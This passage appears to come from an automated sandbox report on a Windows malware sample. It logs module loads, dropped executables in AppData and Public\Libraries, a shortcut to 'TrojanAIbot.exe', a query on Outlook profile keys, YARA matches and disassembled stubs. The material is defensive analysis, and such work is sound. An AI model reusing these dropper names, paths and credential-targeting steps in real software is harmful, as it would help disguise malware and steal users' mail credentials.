                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: version.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: url.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: dbghelp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptdll.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: mpr.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: secur32.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: dnsapi.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: ntmarta.dll
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: TrojanAIbot.exe.lnk.10.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: 2jbMIxCFsK.exeStatic file information: File size 1392640 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 0.2.2jbMIxCFsK.exe.2e60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02E7894C
                      Source: Wisrysxl.PIF.6.drStatic PE information: real checksum: 0x0 should be: 0x15c6e6
                      Source: 2jbMIxCFsK.exeStatic PE information: real checksum: 0x0 should be: 0x15c6e6
                      Source: neworigin.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x480db
                      Source: armsvc.exe.8.drStatic PE information: real checksum: 0x32318 should be: 0x14991f
                      Source: lxsyrsiW.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: TrojanAIbot.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: server_BTC.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.4.drStatic PE information: section name: .didat
                      Source: armsvc.exe.8.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E8D2FC push 02E8D367h; ret 0_2_02E8D35F
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E663AE push 02E6640Bh; ret 0_2_02E66403
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E663B0 push 02E6640Bh; ret 0_2_02E66403
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E8C378 push 02E8C56Eh; ret 0_2_02E8C566
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6C349 push 8B02E6C1h; ret 0_2_02E6C34E
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6332C push eax; ret 0_2_02E63368
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E8D0AC push 02E8D125h; ret 0_2_02E8D11D
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7306C push 02E730B9h; ret 0_2_02E730B1
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7306B push 02E730B9h; ret 0_2_02E730B1
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E8D1F8 push 02E8D288h; ret 0_2_02E8D280
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E8D144 push 02E8D1ECh; ret 0_2_02E8D1E4
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7F108 push ecx; mov dword ptr [esp], edx0_2_02E7F10D
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E66784 push 02E667C6h; ret 0_2_02E667BE
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E66782 push 02E667C6h; ret 0_2_02E667BE
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6D5A0 push 02E6D5CCh; ret 0_2_02E6D5C4
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6C56C push ecx; mov dword ptr [esp], edx0_2_02E6C571
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E8C570 push 02E8C56Eh; ret 0_2_02E8C566
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7AAE0 push 02E7AB18h; ret 0_2_02E7AB10
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E78AD8 push 02E78B10h; ret 0_2_02E78B08
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6CA4E push 02E6CD72h; ret 0_2_02E6CD6A
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6CBEC push 02E6CD72h; ret 0_2_02E6CD6A
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7886C push 02E788AEh; ret 0_2_02E788A6
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02ED4850 push eax; ret 0_2_02ED4920
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E76946 push 02E769F3h; ret 0_2_02E769EB
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E76948 push 02E769F3h; ret 0_2_02E769EB
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7790C push 02E77989h; ret 0_2_02E77981
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E75E7C push ecx; mov dword ptr [esp], edx0_2_02E75E7E
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E72F60 push 02E72FD6h; ret 0_2_02E72FCE
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009E0C55 push edi; retf 9_2_009E0C7A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0306632D push eax; ret 11_2_03066341
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_03063A9C push ebx; retf 11_2_03063ADA

